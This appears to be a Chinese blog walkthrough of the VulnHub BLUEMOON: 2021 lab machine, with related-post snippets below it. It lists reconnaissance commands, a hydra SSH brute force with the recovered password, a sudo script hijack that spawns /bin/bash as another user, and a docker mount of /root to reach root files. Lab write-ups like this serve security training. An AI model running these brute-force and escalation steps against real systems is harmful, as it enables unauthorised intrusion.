VulnHub-BLUEMOON: 2021靶机

原创 已于 2022-03-29 10:59:34 修改 · 5.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #其他

于 2022-03-29 10:55:51 首次发布

前言:

        时隔二十多天我又来了,到vulnhub上随便下了个靶机进行打靶试试。

        kali:192.168.22.140

        靶机IP:192.168.22.144

信息收集:

        扫描靶机IP:

arp-scan -l

        获得靶机ip: 

        

        扫描靶机开放的端口和服务:

nmap -A -p 1-65535 192.168.22.144

        看见开放的端口是21,22,80;

        老规矩先进入80web服务: http://192.168.22.144;记住查看页面源代码,但是并没什么发现

        目录扫描:使用dirmap对网站进行目录扫描;

python3 dirmap.py -i http://192.168.22.144 -lcf

         得到 hidden_text,字典要大,平常要多收集自己的字典,平常的一些扫不到这个 。 

         进入:

http://192.168.22.144/hidden_text

 

         点击:得到一个二维码,微信扫一扫得到以下ftp的账号密码。

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

         登入ftp:看见有两个文件。

         get到kali里:   #如果桌面没有就去根目录找。

get information.txt
get p_lists.txt

        翻译:

        你好,robin…!

        我已经告诉过你你的密码不行。我给出一个密码列表,你可以选择一个密码。

         好家伙给了我个密码表,都拿到密码表了,80服务和21服务都用上了,最后就只有一个22ssh服务了,那肯定是ssh爆破了,但是ssh服务要用户名他没给你吗?“Hello robin”。用户名应该是robin吧,先试试。

        输入:  #看自己的文件路径

hydra -l robin -P /root/Desktop/p_lists.txt ssh://192.168.22.144

        得到:[22][ssh] host: 192.168.22.144   login: robin   password: k4rv3ndh4nh4ck3r

         登入ssh:

         成功进入查找flag,得到第一个flag。

提权:

        先列出robin用户可执行和不可执行的命令,看见最后一句说jerry可以执行feedback.sh,但是它所属于robin用户,所以进入目录修改feedback.sh脚本权限;

1,sudo -l    #查看可执行和不可执行命令

2,cd /home/robin/project    #进入脚本目录

3,chmod 777 feedhack.sh    #修改脚本权限

4,echo "#/bin/bash
    > /bin/bash" >feedhack.sh    #脚本中添加以bin/bash来解释执行该脚本

5,sudo -u jerry ./feedhack.sh    #使用jerry用户来执行该脚本(输入的密码是robin的密码就可以)

         进入jerry之后:id发现jerry在docker里面,而docker有root的权限使用命令,所以开始挂载,把root目录下的文件挂载到虚拟机hasi目录下; -it :进虚拟机;alpine:docker的一个操作系统;

1,id    #查看当前用户

2,docker run -v /root:/hasi -it alpine    #将root目录下的文件挂载到虚拟机hasi目录下

获得flag:

        好了!进入之后最后一步进入刚刚挂载的hasi目录下查看root.txt获得flag!!

bluemoon靶机渗透测试
weixin_49340699的博客
06-17 1162
bluemoon靶机渗透测试 环境 kali ;靶机 工具 netdiscover,nmap,dirb,在线解码工具,hydra 流程 我的靶机主机网卡有问题在进入时改一下配置 把ro改为rw signie init=/bin/bash然后ctrl+x运行 进去把/etc/network/interfaces内的网卡名改为ens33(一般虚拟机的虚拟网卡名都是ens33) 用netdiscover –i eth0 –r 192.168.19.0/24对目标网段扫描发现主机 然后nmap –sV 192.
靶机vulnhub靶机billu
weixin_52450702的博客
05-17 859
vulnhub靶机billu
vulnhub——webmachine靶机
Re1_zf的博客
10-30 935
整体考察的几乎都是web知识,并没有涉及到反弹shell和提权之类的知识,关键就是看字典的利用和字典的强大性,字典没有的话,根本扫不出来感觉之所以归为中等难度并非考察的知识点有多难,而是思维扩散性,如果像前面利用cookie的方式得到前后flag后就直接提交的话,这个分就没了,它并不完整渗透涉及的知识都是常用的知识,容易忽略一些东西,尤其是像做题这种还是得保持严谨的思维。
vulnhubBLUEMOON: 2021
qwweggfe的博客
08-10 515
信息搜集: 首先进行目录扫描 进行端口扫描 nmap -sC -sV -p- 192.168.181.148 --min-rate=2000 开启了21,22,和80端口,于是打开网页进行查看 进行目录探测 gobuster dir -u http://192.168.181.148/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,txt,html -t 20 扫..
BLUEMOON: 2021
wanguixiu的博客
06-11 639
BLUEMOON: 2021 作者: admin 时间: 2021-06-10 分类: vulnhub靶场 fping -g 192.168.137.1/24 # step1 扫主机,找到靶场131 nmap -A -p 1-65535 -v 192.168.137.131 # step2 扫端口,扫到21,22,80 dirb http:/...
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 2589
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
Vulnhub--BlueSky:1
m0_63206880的博客
12-30 807
靶场下载地址https://download.vulnhub.com/bluesky/BlueSky.ova 首先扫描一下外网存活ip 找到目标机器的ip 扫描开放了扫描端口服务 得知开了 22 ssh 与8080 目标上还运行了一个Apache Tomcat Tomcat是应用(java)服务器,它只是一个servlet容器,是Apache的扩展 Struts2 漏洞介绍 Struts2:是apache项目下的一个web 框架 漏洞涉及Stru...
轻院课程-VulnHub-AI-web-1.0靶机渗透
最新发布
问芙的博客
09-05 1769
难度:中级网络:DHCP网络模式:NAT该框旨在测试渗透测试人员的技能。目标很简单。从 /root/flag.txt 获取标志。枚举框,获取低特权 shell,然后将权限升级到 root目标:获取 root 特权、拿到flag。
Vulnhub-BUFFEMR: 1.0.1渗透
laoyanCZ的博客
12-17 1284
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
BlueMoon靶机
Amire0x的小乐园
03-09 564
蓝月靶机测试 先把kali和靶机网卡调到nat模式,便于位于同一网段进行通信 存活主机扫描 kali中看到自己的ip 开始扫描同网段存活主机 工具采用nmap nmap 192.168.95.0/24 居然一直扫不到,同ip段没有目标主机,想来是哪儿有问题。 遂找到资料 一顿操作后配置修改成功 再次扫描,这波直接出结果。 可以看到是目标开放了ftp ssh 和 http三个端口 再扫描一下端口获取详细的banner nmap -A -sV 192,168.95.134 21 端口运行着 vsftp,版
vulnhub靶场之bluemoon
weixin_42478365的博客
04-28 848
sudo切换用户,docker提权,文件配置信息泄露
VulnHubBlueMoon
Aukum的博客
08-14 1223
VulnHub——BlueMoon: 2021,一个easy难度的新手靶机。知识点涉及:信息收集,hydra爆破,sudo提权,docker提权。
vulnhub靶机bluemoon
m0_73248913的博客
01-23 479
vulnhub靶机
BlueMoon靶机(从安装到通关)一文章搞定
tlp_zzm的博客
10-24 374
我们可以将 /bin/bash 赋值给 feedback 这个变量,这样我们就能得到 jerry 的 shell 了。也就是说 feedback 这个变量是我们可控的,如果feedback赋值/bin/bash将得到一个类似shell窗口。在 docker 组中,这样我们就可以借用 docker,将靶机上的目录挂载到容器中,这样我们就能访问受限目录了。但是这个文章里面用vim编辑,一般来说靶机没有安装vim,我都是用vi编辑,或者大佬都用nano编辑。拿到flag,就可以撤了。但是不是最终的flag。
bluemoon_2021靶机详解
weixin_44681307的博客
07-18 286
我做这个靶场时候其实提权遇到了很多问题,最后没想到是shell的原因,后来重新建立了个shell就提权成功了,很简单的一个靶场。并且我们发现jerry用户是运行着一个docker的,因为以前见到过docker提权,所以就找了一条docker提权的命令。点击Thank You …cd到feedback.sh所在的文件,查看一下这个.sh文件,最后一行是我自己加的,请忽略。靶机的主页面并没有太多东西,但是这个图片里面是隐写了东西的,这里是个误导,我还研究了半天。然后我又扫描了一下目录,发现有一个奇怪的目录。
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
Aluxian_的博客
10-26 1007
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagEasy (简单的)1.信息收集工具得使用2.提权命令的使用3.FTP下载、hydra爆破、SSH登入 渗透的流程思路🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 4001
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
Vulnhub渗透靶机系列----DC3
m0_67284865的博客
08-17 184
vulnhub详细步骤解析,Vulnhub渗透靶机系列----DC3
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值